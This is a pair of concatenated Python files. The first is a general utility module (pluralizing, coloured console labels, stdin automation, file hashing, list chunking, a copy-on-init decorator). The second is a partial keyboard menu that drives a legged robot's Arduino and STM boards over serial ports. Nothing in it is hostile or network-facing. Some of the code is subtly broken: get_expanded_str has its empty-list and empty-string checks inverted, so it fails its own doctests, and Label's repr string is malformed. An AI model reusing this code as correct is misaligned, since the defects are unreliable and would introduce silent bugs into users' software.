return wrapped
return wrapper
def pluralize(word: str, n: int, plural: str = 's', append: bool = True) -> str:
"""Pluralize a word.
Args:
word (str): The word to pluralize. `str` is called on this.
n (int): The number that decides if the word should be plural
or not. If this number is 1, the word will not be
pluralized, otherwise it will be.
plural (:obj:`str`, optional): If `append` is True, this string
will be appended to the word if it should be pluralized. If
`append` is false, this string will be returned if the word
should be pluralized. Defaults to 's'.
append (:obj:`bool`, optional): Whether `plural` should be
appended to the word (True) or returned in place of the word
(False). Defaults to True
Returns:
str: The plural of `word` if `n` is not 1. Otherwise return
`word`. If `append` is True, return `word + plural`,
otherwise return `plural`.
Examples:
>>> pluralize('duck', 2)
'ducks'
>>> pluralize('egg', 1)
'egg'
>>> pluralize('cactus', 5, 'cacti', False)
'cacti'
"""
if n == 1:
return str(word)
else:
if append:
return str(word) + plural
else:
return plural
def run_in_background(func: Callable):
"""Run `func` in a thread, letting it finish on its own."""
@wraps(func)
def wrapped(*args, **kwargs):
Thread(target=func, args=args, kwargs=kwargs).start()
return wrapped
@requires_platform('windows')
@run_in_background
def notify(title: str, message: str = ' ', duration: int = 5, icon: os.PathLike = None):
"""Send a windows (only) notification.
Args:
title (str): The title of the notification.
message (:obj:`str`, optional): The message of the
notification.
duration (:obj:`int`, optional): The time (in seconds) for the
notification the show. Defaults to 5.
icon (:obj:`str`, optional): The path of the icon to use. No
icon will be displayed if this is None. Defaults to None.
"""
_toaster.show_toast(title, message, icon, duration)
class Label:
"""A colored label.
`colorama.init()` needs to be called for colors to work on windows.
Colors should be selected from `colorama.Fore`. Default arguments
for the label can be set when the label is instantiated (and are
stored by the same name as attributes). When called, all attributes
can be overwritten as keyword-only arguments, except for `message`,
which is positional.
Args / Attributes:
label (str): The label.
label_color (:obj:`str`, optional): The color of the label, this
should be an ANSI color code. Defaults to `RESET`.
message (:obj:`str`, optional): The message. Defaults to None.
message_color (:obj:`str`, optional): The color of the message,
this should be an ANSI color code. Defaults to `RESET`.
encasing (:obj:`tuple[str]`, optional): A tuple of two strings.
This is whats printed on either side of the label. Defaults
to ('[', ']').
encasing_color (:obj:`str`, optional): The color of the
encasing, this should be an ANSI color code. Defaults to
`RESET`.
pre (:obj:`str`, optional): The string to be printed before the
first encasing. Defaults to an empty string.
end (:obj:`str`, optional): The string to be printed after the
message. Defaults to '\n'.
Examples:
>>> import colorama
>>> from platform import system
>>> from colorama import Fore
>>> if system() == 'Windows':
... colorama.init()
>>> class Labels:
... error = Label('Error', Fore.LIGHTRED_EX)
... success = Label('Success', Fore.LIGHTGREEN_EX)
>>> Labels.error('error message with red label')
[Error] error message with red label
>>> Labels.success('success message with green label')
[Success] success message with green label
>>> Labels.error('message', label='Label Overwrite')
[Label Overwrite] message
>>> Labels.success.encasing = ('(', ')')
>>> Labels.success('success message with green label in parens')
(Success) success message with green label in parens
"""
def __init__(self, label: str, label_color=Fore.RESET, message: str = None,
message_color=Fore.WHITE, *, encasing: Tuple[str, str] = ('[', ']'),
encasing_color=Fore.WHITE, pre: str = '', end: str = '\n'):
self.label = label
self.label_color = label_color
self.message = message
self.message_color = message_color
self.encasing = encasing
self.encasing_color = encasing_color
self.pre = pre
self.end = end
def __repr__(self):
return ((f'Label(label={self.label!r}), label_color={self.label_color!r}, '
f'message={self.message!r}, message_color={self.message_color!r}, '
f'encasing=({self.encasing!r}), encasing_color={self.encasing_color!r}, '
f'pre={self.pre!r}, end={self.end!r}'))
def __len__(self):
message = '' if self.message is None else self.message
return sum((1, *map(len, (self.label, self.encasing[0], self.encasing[1], message))))
def __call__(self, message: str = None, *, label: str = None, label_color=None, message_color=None,
encasing: tuple = None, encasing_color=None, pre: str = None, end: str = None):
if message is None:
if self.message is None:
message = ''
else:
message = self.message
if label is None:
label = self.label
if label_color is None:
label_color = self.label_color
if message_color is None:
message_color = self.message_color
if encasing is None:
encasing = self.encasing
if encasing_color is None:
encasing_color = self.encasing_color
if pre is None:
pre = self.pre
if end is None:
end = self.end
print(''.join((pre, encasing_color, encasing[0], label_color, label, Fore.RESET,
encasing_color, encasing[1], ' ', message_color, message, Fore.RESET)),
end=end)
class AutoInput(_RedirectStream):
"""A context manager to write to stdin with (to automate `input()`).
Args:
*args (str): The strings to use as inputs (in the order to be
used).
Example:
>>> with AutoInput('hello', 'goodbye') as ai:
... ai.add('eggs', 'spam')
... print(input(), input(), input(), input())
...
hello goodbye eggs spam
"""
def __init__(self, *args: str):
super().__init__(StringIO())
self._stream = 'stdin'
self.add(*args)
def add(self, *args: str):
location = self._new_target.tell()
# Go to the end of the stream.
for _ in self._new_target.readlines():
pass
self._new_target.write('\n'.join(args) + '\n')
self._new_target.seek(location)
def __enter__(self):
super().__enter__()
return self
def auto_input_decorator(*inputs: str):
"""Use `AutoInput` as a decorator. Primarily for debugging.
Args:
*inputs (str): The strings to use as inputs (in the order to be
used).
Example:
>>> @auto_input_decorator('hello', 'goodbye')
... def func(a):
... print(input())
... print(a)
... print(input())
>>> func('eggs')
hello
eggs
goodbye
"""
def wrapper(func):
@wraps(func)
def wrapped(*args, **kwargs):
with AutoInput(*inputs):
return func(*args, **kwargs)
return wrapped
return wrapper
def hash_file(f: BinaryIO, algorithm: Callable = hashlib.blake2b, block_size: int = 65536) -> bytes:
"""Get the digest of the hash of a file.
Args:
f (BinaryIO): Readable binary file-like object to hash.
algorithm (:obj:`object`, optional): The hash algorithm object
to use. This should have an `update` method. Defaults to
`hashlib.blake2b`.
block_size (:obj:`int`, optional): The amount of bytes to read
into memory at once. This should be a multiple of the hash
algorithm's block size. Defaults to 65536.
Returns:
bytes: The digest of the hash.
"""
hash_ = algorithm()
while True:
buf = f.read(block_size)
if not buf:
break
hash_.update(buf)
return hash_.digest()
def hash_file_hex(f: BinaryIO, algorithm: Callable = hashlib.blake2b, block_size: int = 65536) -> str:
"""Get the hex digest of the hash of a file.
Args:
f (os.pathlike, str): Readable binary file-like object to hash.
algorithm (:obj:`object`, optional): The hash algorithm object
to use. This should have an `update` method. Defaults to
`hashlib.blake2b`.
block_size (:obj:`int`, optional): The amount of bytes to read
into memory at once. This should be a multiple of the hash
algorithm's block size. Defaults to 65536.
Returns:
str: The hex digest of the hash.
"""
hash_ = algorithm()
while True:
buf = f.read(block_size)
if not buf:
break
hash_.update(buf)
return hash_.hexdigest()
def iter_all_files(path: os.PathLike, on_error: Callable = None,
follow_links: bool = False) -> Generator[str, None, None]:
"""Iterate over all files and subfiles in a directory.
Note that directories will not be yielded.
Args:
path (os.PathLike): The path to iterate over.
on_error (:obj:`Callable`, optional): A function that will be
called in the event of an error. It will be called with one
argument--an `OSError` instance. It can raise an error to
abort the walk or not raise an error and continue.
follow_links (:obj:`bool`, optional): Whether or not to follow
symlinks. Defaults to `False`.
Yields:
str: The path of the file at this step of the iteration.
"""
path_join = os.path.join
for root, _, files in os.walk(path, onerror=on_error, followlinks=follow_links):
for file in files:
yield path_join(root, file)
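# Illustrative sketch (not part of the original module): combining iter_all_files
# with hash_file_hex above to fingerprint every file under a directory. The directory
# path is whatever the caller supplies.
def _example_hash_directory(path: os.PathLike) -> dict:
    digests = {}
    for file_path in iter_all_files(path):
        with open(file_path, 'rb') as f:
            digests[file_path] = hash_file_hex(f)
    return digests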
def chunk_list_inplace(lst: List[T], size: int) -> List[List[T]]:
"""Split a list into chunks (in place).
If the list doesn't divide equally, all excess items are appended to
the end of the output list. To drop the excess items, use
`chunk_list_inplace_drop_excess`.
For performance reasons, this function modifies the original list.
To not modify the original list, use `chunk_list`.
Args:
lst (list): The list to chunk.
size (int): The size of chunks to make.
Examples:
>>> chunk_list_inplace([1, 2, 3, 4, 5, 6, 7, 8, 9, 10], 2)
[[1, 2], [3, 4], [5, 6], [7, 8], [9, 10]]
>>> chunk_list_inplace([1, 2, 3, 4, 5, 6, 7, 8, 9, 10], 3)
[[1, 2, 3], [4, 5, 6], [7, 8, 9], [10]]
>>> chunk_list_inplace([1, 2, 3, 4, 5, 6, 7, 8, 9, 10], 4)
[[1, 2, 3, 4], [5, 6, 7, 8], [9, 10]]
"""
out = []
while lst:
out.append(lst[:size])
del lst[:size]
return out
def chunk_list_inplace_drop_excess(lst: List[T], size: int) -> List[List[T]]:
"""Split a list into chunks (in place).
If the list doesn't divide equally, all excess items are dropped. To
keep the excess items, use `chunk_list_inplace`.
For performance reasons, this function modifies the original list.
To not modify the original list, use `chunk_list_drop_excess`.
Args:
lst (list): The list to chunk.
size (int): The size of chunks to make.
Examples:
>>> chunk_list_inplace_drop_excess(
... [1, 2, 3, 4, 5, 6, 7, 8, 9, 10], 2)
[[1, 2], [3, 4], [5, 6], [7, 8], [9, 10]]
>>> chunk_list_inplace_drop_excess(
... [1, 2, 3, 4, 5, 6, 7, 8, 9, 10], 3)
[[1, 2, 3], [4, 5, 6], [7, 8, 9]]
>>> chunk_list_inplace_drop_excess(
... [1, 2, 3, 4, 5, 6, 7, 8, 9, 10], 4)
[[1, 2, 3, 4], [5, 6, 7, 8]]
"""
out = chunk_list_inplace(lst, size)
if len(out[-1]) != size:
out.pop()
return out
def chunk_list(lst: List[T], size: int) -> List[List[T]]:
"""Split a list into chunks.
If the list doesn't divide equally, all excess items are appended to
the end of the output list. To drop the excess items, use
`chunk_list_drop_excess`.
If the original list is not used after this function is run (and can
safely be modified), use `chunk_list_inplace` for performance
reasons.
Args:
lst (list): The list to chunk.
size (int): The size of chunks to make.
Examples:
>>> chunk_list([1, 2, 3, 4, 5, 6, 7, 8, 9, 10], 2)
[[1, 2], [3, 4], [5, 6], [7, 8], [9, 10]]
>>> chunk_list([1, 2, 3, 4, 5, 6, 7, 8, 9, 10], 3)
[[1, 2, 3], [4, 5, 6], [7, 8, 9], [10]]
>>> chunk_list([1, 2, 3, 4, 5, 6, 7, 8, 9, 10], 4)
[[1, 2, 3, 4], [5, 6, 7, 8], [9, 10]]
"""
return chunk_list_inplace(list(lst), size)
def chunk_list_drop_excess(lst: List[T], size: int) -> List[List[T]]:
"""Split a list into chunks.
If the list doesn't divide equally, all excess items are dropped. To
keep the excess items, use `chunk_list`.
If the original list is not used after this function is run (and can
safely be modified), use `chunk_list_inplace_drop_excess` for
performance reasons.
Args:
lst (list): The list to chunk.
size (int): The size of chunks to make.
Examples:
>>> chunk_list_drop_excess([1, 2, 3, 4, 5, 6, 7, 8, 9, 10], 2)
[[1, 2], [3, 4], [5, 6], [7, 8], [9, 10]]
>>> chunk_list_drop_excess([1, 2, 3, 4, 5, 6, 7, 8, 9, 10], 3)
[[1, 2, 3], [4, 5, 6], [7, 8, 9]]
>>> chunk_list_drop_excess([1, 2, 3, 4, 5, 6, 7, 8, 9, 10], 4)
[[1, 2, 3, 4], [5, 6, 7, 8]]
"""
return chunk_list_inplace_drop_excess(list(lst), size)
def get_expanded_str(string: str, lst: List[str], key: Callable[[str], str] = lambda x: x):
"""Get the first string of a list that starts with the most
characters of a given string.
If the string is empty, return the first item of the list. If the
list is empty as well, raise a `ValueError`. A `ValueError` will be
raised if the string is not in the list.
Args:
string (str): The string (or string-like object) to find
characters in common with.
lst (List[str]): The list of strings to test against. This list
should contain `str`s or string-like objects.
key (:obj:`Callable`, optional): This is called on each item of
`lst` to get the string to use for that item's score. Should
return a `str` or string-like object.
Raises:
ValueError: If no item of the list has any beginning characters
in common with the string.
Examples:
>>> get_expanded_str('ro', ['rock', 'paper', 'scissors'])
'rock'
>>> get_expanded_str('', ['rock', 'paper', 'scissors'])
'rock'
>>> get_expanded_str('rock', ['rock', 'paper', 'scissors'])
'rock'
>>> get_expanded_str('egg', ['rock', 'paper', 'scissors'])
Traceback (most recent call last):
...
ValueError: string 'egg' not in list
>>> class Human:
... def __init__(self, name: str):
... self.name = name
... def __repr__(self):
... return f'Human(name={self.name!r})'
>>> humans = [Human('joe'), Human('liam'), Human('bob')]
>>> get_expanded_str('li', humans, key=lambda x: x.name)
Human(name='liam')
"""
if lst:
if not string:
return lst[0]
else:
raise ValueError(f'string {string!r} not in list')
scores = {i: 0 for i in lst}
for original in lst:
i = key(original)
if i == string:
            return original
score = 0
with suppress(IndexError):
for n, char in enumerate(i):
if not char == string[n]:
break
score += 1
scores[original] = score
guess = max(scores.items(), key=lambda i: i[1])
if len(key(guess[0])) < len(string) or guess[1] == 0:
raise ValueError(f'string {string!r} not in list')
return guess[0]
def memoize_from_attrs(attrs_iter: Iterable[str], *attrs: str):
"""Memoize a method based of the object's attributes.
This is a decorator. Cache the return value of a method and bind the
cached value to the current values of `attrs`. If all `attrs` of
the object are the same as a previous time the method was run, use
the cached value. The method will only ever be run one time for each
unique combination of attribute values.
Args:
        *attrs (str): The attributes to check. If the first argument is
            not a `str`, its contents will be used as arguments.
Examples:
>>> class C:
... def __init__(self):
... self.a = 5
... @memoize_from_attrs('a')
... def method(self):
... print('ran C.method()')
... return self.a + 3
...
>>> c=C()
>>> c.method()
ran C.method()
8
>>> c.method()
8
>>> c.a = 10
>>> c.method()
ran C.method()
13
>>> c.a = 5
>>> c.method()
8
"""
    if isinstance(attrs_iter, str):
        attrs = (attrs_iter, *attrs)
    else:
        attrs = (*attrs_iter, *attrs)
def wrapper(func):
@wraps(func)
def wrapped(obj, *args, **kwargs):
obj_attrs = tuple(getattr(obj, attr) for attr in attrs)
try:
return obj.__attr_memoize[obj_attrs]
except KeyError:
pass
except AttributeError:
obj.__attr_memoize = {}
result = func(obj, *args, **kwargs)
obj.__attr_memoize[obj_attrs] = result
return result
return wrapped
return wrapper
def gen_run(*funcs: Callable[[], T]) -> Generator[T, None, None]:
"""Run a list of callables as iterated over.
Passing keyword arguments to the functions is not supported--use
lambdas instead. To call every callable when the function is run,
use `run`.
Args:
*funcs: The objects to call.
Yields:
The output of the callables.
Examples:
>>> def f(a):
... print('ran f')
... return a + 5
>>> for i in gen_run(lambda: f(1), lambda: f(2)):
... print(i)
ran f
6
ran f
7
"""
for func in funcs:
yield func()
def run(*funcs: Callable[[], T]) -> List[T]:
"""Run a list of callables.
Passing keyword arguments to the functions is not supported--use
lambdas instead. To call the functions as they are being iterated
over (as a generator), use `gen_run`.
Args:
*funcs: The objects to call.
Returns:
list: The output of the functions.
Examples:
>>> def f(a):
... print('ran f')
... return a + 5
>>> run(lambda: f(1), lambda: f(2))
ran f
ran f
[6, 7]
"""
return [func() for func in funcs]
def _copy_to_obj(src: T, dst: T, shallow_copy: bool = False):
"""Copy object `src` to object `dst`.
This will work for object using `__slots__` as well as `__dict__`.
"""
copy_func = copy if shallow_copy else deepcopy
if hasattr(src.__class__, '__slots__'):
for attr in src.__slots__:
if hasattr(src, attr):
setattr(dst, attr, copy_func(getattr(src, attr)))
else:
dst.__dict__ = copy_func(src.__dict__)
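# Illustrative sketch (not part of the library API): `_copy_to_obj` duplicates one
# instance's state onto another, whether the class stores attributes in `__dict__`
# or declares `__slots__`. The `Point` class below is hypothetical.
#
#     class Point:
#         __slots__ = ('x', 'y')
#     a = Point(); a.x, a.y = 1, 2
#     b = Point()
#     _copy_to_obj(a, b)  # now b.x == 1 and b.y == 2, deep-copied by default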
def copy_init(shallow_copy: bool = False):
"""This is a decorator that will allow an `__init__` method to copy another object.
This should only be used to decorate the `__init__` method of a
class. If `__init__` is called with only one argument that is an
object of the same class, that object's properties will be copied
instead of calling this object's `__init__` method. This means that
`__init__` will *not* be called when copying. This also means that
    `__init__` does not require arguments after the first to be optional
    (`__init__(self, x, y, z)` is a perfectly valid signature).
    This also works with classes that use `__slots__`.
    Note that this decorator, when used without arguments, should not
    be called with parentheses at the end, e.g. `@copy_init` should be
used instead of `@copy_init()`.
When writing docstrings, it's recommended to mention the copying
behaviour and have the type annotation of the first argument be a
`typing.Union`.
Args:
        shallow_copy (bool): Use `copy.copy` if true, otherwise use
            `copy.deepcopy`. Defaults to false.
Examples:
>>> class C:
... @copy_init
... def __init__(self, a, b):
... self.a = a
... self.b = b
...
... def __repr__(self):
... return f'C(a={self.a}, b={self.b})'
...
>>> C(1, 2)
C(a=1, b=2)
>>> eggs = C(1, 2)
>>> C(eggs)
C(a=1, b=2)
>>> # attributes will be `deep_copy`ed by default
>>> foo = C(0, [1, 2, 3])
>>> bar = C(foo)
>>> foo.b.append(4)
>>> foo
C(a=0, b=[1, 2, 3, 4])
>>> bar
C(a=0, b=[1, 2, 3])
>>> # with shallow copying
>>> class C:
... @copy_init(shallow_copy=True)
... def __init__(self, a, b):
... self.a = a
... self.b = b
...
... def __repr__(self):
... return f'C(a={self.a}, b={self.b})'
...
>>> foo = C(0, [1, 2, 3])
>>> bar = C(foo)
>>> foo.b.append(4)
>>> foo
C(a=0, b=[1, 2, 3, 4])
>>> bar
C(a=0, b=[1, 2, 3, 4])
"""
# if `shallow_copy` is callable, that means this decorator is being used without parentheses, so `shallow_copy` is
# the function that we're wrapping.
func = None
if callable(shallow_copy):
func = shallow_copy
shallow_copy = False
class Decorator:
def __init__(self, func):
self.func = func
def __set_name__(self, owner, name):
# here's some light reading on when `__set_name__` is called:
# https://docs.python.org/3/reference/datamodel.html#creating-the-class-object
nonlocal shallow_copy
@wraps(self.func)
def wrapper(wrapper_self, *args, **kwargs):
if not args:
self.func(wrapper_self, **kwargs)
else:
first = args[0]
if wrapper_self.__class__ is first.__class__:
_copy_to_obj(first, wrapper_self, shallow_copy)
else:
self.func(wrapper_self, *args, **kwargs)
setattr(owner, name, wrapper)
if func is not None:
return Decorator(func)
else:
return Decorator
if __name__ == '__main__':
import doctest
doctest.testmod()
|
menu.py
|
#!/usr/bin/python3
import time
import sys
import glob
import serial
import re
import threading
import queue
import os
from logging import getLogger, StreamHandler, FileHandler, Formatter, DEBUG
logger = getLogger(__name__)
logger.setLevel(DEBUG)
stream_formatter = Formatter('%(message)s')
stream_handler = StreamHandler()
stream_handler.setLevel(DEBUG)
stream_handler.setFormatter(stream_formatter)
logger.addHandler(stream_handler)
os.makedirs("./log",exist_ok=True)
log_file_name = "./log/log-" + time.strftime("%Y%m%d-%H%M%S", time.strptime(time.ctime()))+".txt"
file_handler = FileHandler(log_file_name)
file_handler.setLevel(DEBUG)
file_formatter = Formatter('[%(asctime)s] %(message)s')
file_handler.setFormatter(file_formatter)
logger.addHandler(file_handler)
logger.propagate = False
key_command_map = {
b'\t':["motion",[["left"]]],
b'/':["motion",[["right"]]],
b'*':["scenario",["walk"]],
b'\x08':["scenario",["back"]], # Windows
b'\x7f':["scenario",["back"]], # Linux
b'7':["motor_command",["up"]],
b'8':["motor_id",0],
b'9':["motor_id",3],
b'-':["motor_command",["move", 0]],
b'4':["motor_command",["down"]],
b'5':["motor_id",1],
b'6':["motor_id",4],
b'+':["motor_command",["move",100]],
b'1':["motion",[["stm_init"]]],
b'2':["motor_id",2],
b'3':["motor_id",5],
b'\r':["command",["stop"]],
b'0':["command",["clear"]],
b'.':["motor_id",999],
b'\x1b':["escape"],
b'[':["escape"]
}
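# Each entry above maps a raw key byte (as returned by _Getch below) to a
# [command_type, argument] pair consumed by menu(); for example, pressing '*'
# queues the "walk" scenario and '7' issues an "up" motor command for the
# currently selected motor id.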
linux_esc_key_command_map = {
b'H':["motor_command",["up"]],
b'A':["motor_id",0],
b'5':["motor_id",3],
b'D':["motor_command",["down"]],
b'E':["motor_id",1],
b'C':["motor_id",4],
b'F':["motion",[["stm_init"]]],
b'B':["motor_id",2],
b'6':["motor_id",5],
b'2':["command",["clear"]],
b'3':["motor_id",999],
b'\x1b':["escape"],
b'[':["escape"]
}
arduino_available = False
stm_available = False
legs = 0
scenario_repeat = 1
motor_height = []
motor_id_mapping = {}
id_motor_mapping = {}
default_motor_id_mapping_2legs = {0:"2",1:"5"}
#
# 2 legs (with the 2nd and 3rd Arduinos detached)
#
# Front
# +-----+
# 0:"2" | | 2:"5"
# +-----+
# Back
#
default_motor_id_mapping_4legs = {0:"2",1:"3",2:"5",3:"6"}
#
# 4 legs (with the 3rd Arduino detached)
#
# Front
# +-----+
# 0:"2" | | 2:"5"
# 1:"3" | | 3:"6"
# +-----+
# Back
#
# right: 0:"2",4:"6",2:"4"
# left : 3:"5",1:"3",5:"7"
#
default_motor_id_mapping_6legs = {0:"2",1:"3",2:"4",3:"5",4:"6",5:"7"}
#
# 6 legs
#
# Front
# +-----+
# 0:"2" | | 3:"5"
# 1:"3" | | 4:"6"
# 2:"4" | | 5:"7"
# +-----+
# Back
#
# right: 0:"2",4:"6",2:"4"
# left : 3:"5",1:"3",5:"7"
#
arduino_id_mapping = {}
scenario_walk = [
[["right"]],
[["wait",2.0]],
[["move",0,0,1],
["move",4,0,1],
["move",2,0,1]],
[["wait",1.0]],
[["move",3,100,1],
["move",1,100,1],
["move",5,100,1]],
[["wait",1.0]],
[["left"]],
[["wait",2.0]],
[["move",3,0,1],
["move",1,0,1],
["move",5,0,1]],
[["wait",1.0]],
[["move",0,100,1],
["move",4,100,1],
["move",2,100,1]],
[["wait",1.0]]
]
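# A scenario is a list of motion steps; each step is a list of commands that
# motion_player() dispatches together, e.g. ["move", leg_index, position, payload],
# ["wait", seconds], or the direction keywords ["left"] / ["right"].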
scenario_back = [
[["left"]],
[["wait",5.0]],
[["move",0,0,1], ["move",3,0,0],
["move",1,0,0], ["move",4,0,1],
["move",2,0,1], ["move",5,0,0]],
[["wait",5.0]],
[["right"]],
[["wait",5.0]],
[["move",0,100,0], ["move",3,100,1],
["move",1,100,1], ["move",4,100,0],
["move",2,100,0], ["move",5,100,1]],
[["wait",5.0]]
]
arduino_ports = []
stm_ports = []
arduino_ser = []
stm_ser = []
class _Getch:
"""Gets a single character from standard input. Does not echo to the
screen."""
def __init__(self):
try:
self.impl = _GetchWindows()
except ImportError:
self.impl = _GetchUnix()
def __call__(self): return self.impl()
class _GetchUnix:
def __init__(self):
import tty, sys
def __call__(self):
import sys, tty, termios
fd = sys.stdin.fileno()
old_settings = termios.tcgetattr(fd)
try:
tty.setraw(sys.stdin.fileno())
ch = sys.stdin.read(1)
finally:
termios.tcsetattr(fd, termios.TCSADRAIN, old_settings)
return ch.encode('utf-8')
class _GetchWindows:
def __init__(self):
import msvcrt
def __call__(self):
import msvcrt
return msvcrt.getch()
def serial_ports():
""" Lists serial port names
:raises EnvironmentError:
On unsupported or unknown platforms
:returns:
A list of the serial ports available on the system
"""
if sys.platform.startswith('win'):
ports = ['COM%s' % (i + 1) for i in range(32)]
elif sys.platform.startswith('linux') or sys.platform.startswith('cygwin'):
# this excludes your current terminal "/dev/tty"
ports = ['/dev/ttyUSB0','/dev/ttyUSB1','/dev/ttyUSB2','/dev/ttyACM0']
elif sys.platform.startswith('darwin'):
ports = glob.glob('/dev/tty.*')
else:
raise EnvironmentError('Unsupported platform')
result = []
for port in ports:
try:
s = serial.Serial(port)
s.close()
result.append(port)
except (OSError, serial.SerialException):
pass
return result
def setup_serial_ports():
logger.debug("************************************")
logger.debug(" serial port set up start !! ")
logger.debug("************************************")
# detect arduino or stm
comlist = serial_ports()
temp_arduino_ports = []
logger.debug(comlist)
for port in comlist:
logger.debug(port)
ser = serial.Serial(port, 115200,timeout=5.0)
#if port == "/dev/ttyACM0":
# stm_ports.append(port)
# continue
line = ser.readline()
ser.write(b"who:\r\n")
logger.debug("[S] who:\r\n")
start_time = current_time = time.time()
search_arduino_ids = False
while current_time - start_time < 60.0:
line = ser.readline()
if len(line) > 0:
logger.debug("[R] %s" %line)
if not search_arduino_ids:
result = re.search(b"arduino",line)
if result:
logger.debug("arduino")
ser.write(b"info:,\r\n")
search_arduino_ids = True
else:
id0 = ((re.findall(b"id0,[1-9]+",line))[0])[4:]
id1 = ((re.findall(b"id1,[1-9]+",line))[0])[4:]
if id0 and id1:
logger.debug("port id0 = %s, id1 = %s" %(id0,id1))
temp_arduino_ports.append([port,id0,id1])
break
result = re.search(b"stm",line)
if result:
logger.debug("stm")
stm_ports.append(port)
break
time.sleep(0.1)
current_time = time.time()
ser.close()
# motor id check and assign id to detected and sorted port
i = 0
for port in sorted(temp_arduino_ports,key=lambda x:x[1]):
arduino_ports.append(port[0])
if port[1].decode('utf-8') in default_motor_id_mapping_6legs.values():
motor_id_mapping.setdefault(i,port[1].decode('utf-8'))
id_motor_mapping.setdefault(port[1].decode('utf-8'),i)
arduino_id_mapping.setdefault(port[1].decode('utf-8'),i)
else:
logger.debug("id mismatch happens !!")
exit()
if port[2].decode('utf-8') in default_motor_id_mapping_6legs.values():
motor_id_mapping.setdefault(i+len(temp_arduino_ports),port[2].decode('utf-8'))
id_motor_mapping.setdefault(port[2].decode('utf-8'),i+len(temp_arduino_ports))
arduino_id_mapping.setdefault(port[2].decode('utf-8'),i)
else:
logger.debug("id mismatch happens !!")
exit()
i = i + 1
logger.debug("arduino_ports = %s" % arduino_ports)
logger.debug("motor_id_mapping = %s" % motor_id_mapping)
logger.debug("id_motor_mapping = %s" % id_motor_mapping)
logger.debug("arduino_id_mapping = %s" % arduino_id_mapping)
logger.debug("stm_ports = %s" % stm_ports)
# opening serial ports
if len(arduino_ports) > 0:
for i in range(len(arduino_ports)):
for _ in range(5):
try:
s = serial.Serial(arduino_ports[i], 115200,timeout=2.0)
break
except (OSError, serial.SerialException):
time.sleep(1.0)
pass
arduino_ser.append(s)
if len(stm_ports) > 0:
for i in range(len(stm_ports)):
for _ in range(5):
try:
s = serial.Serial(stm_ports[i], 115200,timeout=2.0)
break
except (OSError, serial.SerialException):
time.sleep(1.0)
pass
stm_ser.append(s)
logger.debug("************************************")
logger.debug(" port set up end !! ")
logger.debug("************************************")
def arduino_command(command,sender_queue):
if arduino_available == False:
return
if command[0] == "move":
if len(command) == 4:
item = "legM:id,{0}:xmm,{1}:payload,{2}\r\n".format(motor_id_mapping[command[1]],command[2],command[3])
elif len(command) == 3:
item = "legM:id,{0}:xmm,{1}:payload,{2}\r\n".format(motor_id_mapping[command[1]],command[2],motor_height[command[1]])
sender_queue[arduino_id_mapping[motor_id_mapping[command[1]]]].put(item)
time.sleep(0.005)
sender_queue[arduino_id_mapping[motor_id_mapping[command[1]]]].put(item)
time.sleep(0.005)
sender_queue[arduino_id_mapping[motor_id_mapping[command[1]]]].put(item)
else:
item = "None"
pass
logger.debug("[S] arduino[%1d]: %s" %(arduino_id_mapping[motor_id_mapping[command[1]]] ,item))
time.sleep(0.010)
def stm_command(command,sender_queue):
if stm_available == False:
return
if command[0] == "stm_init":
item = "init\r\n"
for i in range(legs):
motor_height[i] = 1
sender_queue[len(arduino_ports)].put(item)
elif command[0] == "right":
if legs == 6:
#item = "right\r\n"
item = "aa\r\n"
for i in range(legs):
motor_height[i] = i % 2
sender_queue[len(arduino_ports)].put(item)
else:
item = "None"
elif command[0] == "left":
if legs == 6:
#item = "left\r\n"
item = "bb\r\n"
for i in range(legs):
motor_height[i] = (i + 1) % 2
sender_queue[len(arduino_ports)].put(item)
else:
item = "None"
elif command[0] == "up":
item = "up {}\r\n".format(command[1])
motor_height[command[1]] = 0
sender_queue[len(arduino_ports)].put(item)
elif command[0] == "down":
item = "down {}\r\n".format(command[1])
motor_height[command[1]] = 1
sender_queue[len(arduino_ports)].put(item)
else:
item = "None"
if item != "None":
logger.debug("[S] stm: %s" % item)
logger.debug("motor_height: %s" % motor_height)
time.sleep(0.002)
def sender(queue,ser):
while True:
item = queue.get()
if item is None:
queue.task_done()
break
ser.write(item.encode('utf-8'))
while ser.out_waiting > 0:
time.sleep(0.002)
def reader(ser,number):
while ser.isOpen():
try:
line = ser.readline()
time.sleep(0.001)
except:
if number < len(arduino_ports):
logger.debug("arduino[%d] exception" %number)
else:
logger.debug("stm port exception")
break
else:
if len(line) > 0:
if number < len(arduino_ports):
logger.debug("[R] arduino[%d]: %s" %(number,line))
else:
logger.debug("[R] stm: %s" % line)
time.sleep(0.001)
if number < len(arduino_ports):
logger.debug("arduino[%d] port closed" %number)
else:
logger.debug("stm port closed")
def motion_player(motion,sender_queue):
logger.debug("motion :: %s" % motion)
for command in motion:
if command[0] == "stm_init":
stm_command(command,sender_queue)
elif command[0] == "right":
stm_command(command,sender_queue)
elif command[0] == "left":
stm_command(command,sender_queue)
elif command[0] == "up":
stm_command(command,sender_queue)
elif command[0] == "down":
stm_command(command,sender_queue)
elif command[0] == "move":
arduino_command(command,sender_queue)
elif command[0] == "wait":
time.sleep(command[1])
else:
pass
def scenario_player(scenario,sender_queue):
logger.debug("************************************")
logger.debug(" scenario start !! ")
logger.debug("************************************")
if stm_available and legs == 6:
for i in range(scenario_repeat):
logger.debug("---- turn %d / %d ----" % (i+1,scenario_repeat))
for motion in scenario:
motion_player(motion,sender_queue)
else:
pass
logger.debug("************************************")
logger.debug(" scenario end !! ")
logger.debug("************************************")
def menu(sender_queue):
logger.debug("************************************")
logger.debug(" start menu ")
logger.debug("************************************")
escape_mode = False
motor_id = -1
getch = _Getch()
while True:
key = getch()
logger.debug('{0} pressed'.format(key))
if key == b'\x03':
break
if key == b'q':
break
if escape_mode == False and key in key_command_map:
command = key_command_map[key]
elif escape_mode == True and key in linux_esc_key_command_map:
command = linux_esc_key_command_map[key]
else:
continue
if command[0] == "escape":
escape_mode = True
elif command[0] == "scenario":
logger.debug("scenario {}".format(command[1]))
if command[1] == ["walk"]:
scenario_player(scenario_walk,sender_queue)
elif command[1] == ["back"]:
scenario_player(scenario_back,sender_queue)
else:
pass
motor_id = -1
escape_mode = False
elif command[0] == "motion":
logger.debug("motion {}".format(command[1]))
motion_player(command[1],sender_queue)
motor_id = -1
escape_mode = False
elif command[0] == "motor_command":
logger.debug("motor_command {}".format(command[1]))
if motor_id == -1 :
logger.debug("motor_id is not set")
pass
elif motor_id < 999:
if command[1] == ["up"]:
motor_command = [["up",motor_id]]
motion_player(motor_command, sender_queue)
elif command[1] == ["down"]:
motor_command = [["down",motor_id]]
motion_player(motor_command, sender_queue)
elif command[1] == ["move",0]:
motor_command = [["move",motor_id,0]]
motion_player(motor_command, sender_queue)
